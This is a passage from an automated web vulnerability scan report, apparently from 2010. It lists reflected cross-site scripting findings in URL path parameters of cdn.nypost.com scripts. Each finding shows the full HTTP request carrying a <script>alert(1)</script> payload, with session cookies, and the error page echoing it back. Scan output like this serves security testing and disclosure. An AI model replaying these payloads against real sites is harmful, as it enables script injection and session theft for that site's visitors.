<p>/r/SysConfig/WebPortal/nypost/blocks1695f<script>alert(1)</script>1bcf5332e79/top_story/top_story_functions.js</p>
...[SNIP]...

1.59. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b150c<script>alert(1)</script>83725971b2c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_storyb150c<script>alert(1)</script>83725971b2c/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_storyb150c<script>alert(1)</script>83725971b2c/top_story_functions.js</p>
...[SNIP]...

1.60. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4575a<script>alert(1)</script>425f54006e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js4575a<script>alert(1)</script>425f54006e HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js4575a<script>alert(1)</script>425f54006e</p>
...[SNIP]...

1.61. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23fa9<script>alert(1)</script>bfa3c330910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig23fa9<script>alert(1)</script>bfa3c330910/WebPortal/nypost/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig23fa9<script>alert(1)</script>bfa3c330910/WebPortal/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.62. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44168<script>alert(1)</script>d9de533e3f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal44168<script>alert(1)</script>d9de533e3f3/nypost/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal44168<script>alert(1)</script>d9de533e3f3/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.63. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5846<script>alert(1)</script>7944c2159fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc5846<script>alert(1)</script>7944c2159fa/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc5846<script>alert(1)</script>7944c2159fa/scripts/block_functions.js</p>
...[SNIP]...

1.64. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6de44<script>alert(1)</script>f7a795687f0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts6de44<script>alert(1)</script>f7a795687f0/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts6de44<script>alert(1)</script>f7a795687f0/block_functions.js</p>
...[SNIP]...

1.65. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f14d0<script>alert(1)</script>7d32754b847 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/block_functions.jsf14d0<script>alert(1)</script>7d32754b847 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/block_functions.jsf14d0<script>alert(1)</script>7d32754b847</p>
...[SNIP]...

1.66. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43474<script>alert(1)</script>d4f45f4e093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig43474<script>alert(1)</script>d4f45f4e093/WebPortal/nypost/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig43474<script>alert(1)</script>d4f45f4e093/WebPortal/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.67. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 336ab<script>alert(1)</script>b1da3cafbfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal336ab<script>alert(1)</script>b1da3cafbfb/nypost/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal336ab<script>alert(1)</script>b1da3cafbfb/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.68. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0a77<script>alert(1)</script>b4b689b67a9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc0a77<script>alert(1)</script>b4b689b67a9/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc0a77<script>alert(1)</script>b4b689b67a9/scripts/dropmenu.js</p>
...[SNIP]...

1.69. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8cbad<script>alert(1)</script>47ea44d790f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts8cbad<script>alert(1)</script>47ea44d790f/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts8cbad<script>alert(1)</script>47ea44d790f/dropmenu.js</p>
...[SNIP]...

1.70. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5e96c<script>alert(1)</script>71b3a089308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js5e96c<script>alert(1)</script>71b3a089308 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js5e96c<script>alert(1)</script>71b3a089308</p>
...[SNIP]...

1.71. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ac23<script>alert(1)</script>b341005b818 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig4ac23<script>alert(1)</script>b341005b818/WebPortal/nypost/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:49 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig4ac23<script>alert(1)</script>b341005b818/WebPortal/nypost/scripts/functions.js</p>
...[SNIP]...

1.72. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
